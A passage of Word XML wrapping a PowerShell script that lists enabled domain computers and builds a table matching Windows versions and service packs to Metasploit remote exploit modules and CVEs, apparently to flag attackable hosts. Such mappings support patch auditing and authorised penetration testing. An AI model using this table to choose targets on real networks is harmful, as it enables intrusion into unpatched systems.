    <w:p w14:paraId="14250DBA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Add computer to list if it's enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8C65E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($CurrentDisabled  -eq 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612DED69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # Add domain computer to data table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F9D2A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Null = $TableAdsComputers.Rows.Add($CurrentHost,$CurrentOS,$CurrentSP,$CurrentLast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40130DA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FFE0B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345BA70A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B240213" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Status user        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F706BC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Write-Verbose "[*] Loading exploit list for critical missing patches..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E32860" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1390D38E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # ----------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3610988C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Setup data table for list of msf exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B901E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # ----------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158B1353" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="13711C2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Create data table for list of patches levels with a MSF exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755235E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $TableExploits = New-Object System.Data.DataTable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEA8CB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Columns.Add('OperatingSystem') </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A248844" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Columns.Add('ServicePack')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468C7F6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Columns.Add('MsfModule')  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170179ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Columns.Add('CVE')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAF4035" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143EF332" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Add exploits to data table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0472A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows 7","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF0799" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C34263" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D6A694" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C17B11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639B2C64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5302E3C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E90EE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ED83F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEB8E16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B6E499" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036C65C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70892C81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D3274" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330561C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70852718" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F39C412" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2623C639" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457850D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C17982" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205F3550" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_070_wkssvc","http://www.cvedetails.com/cve/2006-4691")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8D03AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD2AD82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30572DC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B83945E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DF9DA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB02920" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/smb/ms05_039_pnp","http://www.cvedetails.com/cve/2005-1983")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73266419" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DB0B1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48465770" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D953FD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BF51B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AE597B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AB9D85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC6EF59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D92916" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7409FF4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E93B2F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43459BF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C9A88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27414AC5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDE289C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC88F42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582CC5B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AA0FAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2008","Service Pack 2","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F27D535" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2008","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762B3408" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2008","","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727818AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2008","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0457BC22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Server 2008 R2","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D90DA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Vista","Server Pack 1","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ED0348" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Vista","Server Pack 1","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A38532" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Vista","Service Pack 2","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C39B72A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Vista","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D34A497" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows Vista","","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479B28FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268086F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC5B042" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A078C3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms05_039_pnp","http://www.cvedetails.com/cve/2005-1983")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9C3688" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E503F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D58DEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B247F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7F8F2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_070_wkssvc","http://www.cvedetails.com/cve/2006-4691")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA4468E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B337893" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A561B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
